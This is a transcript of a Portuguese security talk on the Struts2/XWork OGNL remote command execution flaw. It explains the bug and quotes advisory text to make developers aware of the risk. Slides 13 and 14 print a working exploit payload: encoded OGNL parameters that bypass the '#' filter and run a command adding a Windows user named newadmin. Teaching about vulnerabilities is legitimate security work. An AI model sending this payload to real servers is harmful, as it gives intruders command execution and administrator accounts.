A apresentação está carregando. Por favor, espere

A apresentação está carregando. Por favor, espere

Struts2/XWork Remote Command Execution Tiago Natel de Moura

Apresentações semelhantes


Apresentação em tema: "Struts2/XWork Remote Command Execution Tiago Natel de Moura"— Transcrição da apresentação:

1 Struts2/XWork Remote Command Execution Tiago Natel de Moura

2 Sobre mim Pesquisador e co-fundador do grupo BugSec Team. bugsec.googlecode.com Consultor de Segurança na SEC+. Co-Fundador e Lider do Capítulo da OWASP de Florianópolis. Desenvolvedor de algumas ferramentas de segurança:

3 Experiências/Interesses Linguagens: C, C++, Assembly, Lisp Segurança: Desenvolvimento de Exploits; Buffer overflows (Stack/Heap Overrun); Network Protocol (TCP/UDP/IP, WEP/WPA, FTP/HTTP, etc) Análise de Malwares; Web Application Vulnerabilities (SQLI, XSS, CSRF, LFD/RFI, etc) Metodologias de segurança;

4 Sobre essa palestra Falar sobre uma falha crítica no framework Struts que permite ao atacante executar comandos no servidor. Concientizar os desenvolvedores sobre a importância da segurança na escolha das tecnologias utilizadas no projeto.

5 A verdade sobre os frameworks Eles também possuem falhas de segurança... Todos eles... Java – Struts, Hibernate, Spring Microsoft.Net Ruby – Rails, Merb, Ramaze Python – Django, Twisted, web.py PHP – Zend, Symfony, Cake Você audita o código do seu framework?

6 Um pouco sobre Struts e OGNL Struts2 é basicamente um framework para desenvolver aplicações web em Java utilizando a arquitetura de Model-View- Controller (MVC) Object-Graph Navigation Language (OGNL) é uma linguagem para acessar e setar propriedades de objetos Java. Struts2 trata os parametros HTTP como expressões OGNL.

7 CVE – Struts2/XWork Remote Code Execution The OGNL extensive expression evaluation capability in XWork in Struts through , as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "#" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE

8 CVE Apache Struts 'ParameterInterceptor' Class OGNL Security Bypass Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. This issue is related to the vulnerability documented in BID 32101(XWork 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability). Apache Struts versions through are vulnerable.

9 Múltiplas Vulnerabilidades... Remote command execution in Struts <= (ExceptionDelegator) Remote command execution in Struts <= (CookieInterceptor) Arbitrary File Overwrite in Struts <= (ParametersInterceptor) Remote command execution in Struts <= (DebuggingInterceptor)

10 Um exemplo de OGNL action.getPage().setLanguage("en")

11 Como Struts2 e OGNL conduzem para uma execução remota de código OGNL existe para referenciar variáveis usando o prefixo '#'. Adicionalmente, existem contextos pré- definidos como #session, #context...

12 Como Struts2 e OGNL conduzem para uma execução remota de código 1. Descubriu-se que o módulo ParametersInterceptor o qual realiza a transformação das variáveis do GET para Java não escapa '#' de maneira apropriada quando ele é enviado como uma string unicode '\u0023'. 2. Existem duas chaves de contextos importantes: #context – OgnlContext – Este possui a propriedade chamada 'xwork.MethodAccessor.denyMethodExecution' o qual nega a execução de um método. #_memberAccess - SecurityMemberAccess, contém um campo chamado 'allowStaticAccess' o qual previne a execução de métodos estáticos.

13 Como Struts2 e OGNL conduzem para uma execução remota de código É fácil ver aonde isso vai acabar... #_memberAccess['allowStaticMethodAccess'] = true #foo = new java.lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = #rt.exec('net user /add newadmin HACKED')

14 Como Struts2 e OGNL conduzem para uma execução remota de código É facil ver aonde isso vai acabar... #_memberAccess['allowStaticMethodAccess'] = true #foo = new java.lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = #rt.exec('net user /add newadmin HACKED') ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true& (aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.Boolean("false")))& (asdf)(('\u0023rt.exec(net%20user%20/add%20newadmin%20HACKED)')

15 Como escolher a tecnologia a ser usada no projeto? Consulte a comunidade de segurança!

16 The End natel owasp.org github: github.com/tiago4orion


Carregar ppt "Struts2/XWork Remote Command Execution Tiago Natel de Moura"

Apresentações semelhantes


Anúncios Google